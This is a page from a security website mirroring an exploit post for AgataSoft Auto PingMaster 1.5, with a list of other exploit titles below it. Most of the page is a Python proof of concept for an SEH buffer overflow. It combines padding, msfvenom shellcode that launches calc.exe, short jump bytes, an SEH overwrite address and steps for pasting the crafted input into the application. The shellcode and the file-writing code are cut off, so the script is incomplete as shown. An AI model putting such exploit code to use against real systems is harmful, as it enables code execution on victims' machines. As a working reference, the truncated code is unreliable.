首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH)
来源:@bzyo_ 作者:bzyo 发布时间:2018-08-10  

# Exploit Title: AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH)
# Date: 2018-08-03
# Exploit Author: bzyo
# Twitter: @bzyo_
# Vulnerable Software: AgataSoft Auto PingMaster 1.5
# Vendor Homepage: http://agatasoft.com/
# Version: 1.5
# Software Link : http://agatasoft.com/Ping_Master.exe
# Tested Windows 7 SP1 x86

# PoC
# 1. generate ping.txt, copy contents to clipboard
# 2. open application
# 3. select Trace Route
# 4. paste contents from clipBoard to "Host name:" field
# 5. select "Get IP from host name"
# 6. pop calc


# greetz Luis Martínez for find in ebd-id 45137
import struct

junk1 = "A"*100

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x0e" -e x86/alpha_mixed -f c
#Payload size: 448 bytes
calc = ("\x89\xe1\xd9\xf7\xd9\x71\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"

junk3 = "\xcc"*92

jmp3 = "\xe9\x7d\xfd\xff\xff\xcc"

junk2 = "\xcc"*20

jmp1 = "\xeb\xf8\xcc\xcc"

jmp2 = "\xeb\xe4\xcc\xcc\xcc\xcc"

seh = struct.pack('<L',0x00462360)

buffer = junk1 + calc + junk3 + jmp3 + junk2 + jmp2 + jmp1 + seh

with open("ping.txt","wb") as f:

[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·iSmartViewPro 1.5 Account Buff
·CloudMe Sync 1.10.9 - Buffer O
·iSmartViewPro 1.5 Device Alias
·Mikrotik WinBox 6.42 - Credent
·reSIProcate 1.10.2 Heap Overfl
·TP-Link C50 Wireless Router 3
·QNap QVR Client -
·TP-Link C50 Wireless Router 3
·OpenEMR < 5.0.1 - Remote Code
·reSIProcate 1.10.2 - Heap Over
·Wedding Slideshow Studio 1.36
·Linux Kernel 4.14.7 (Ubuntu 1
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved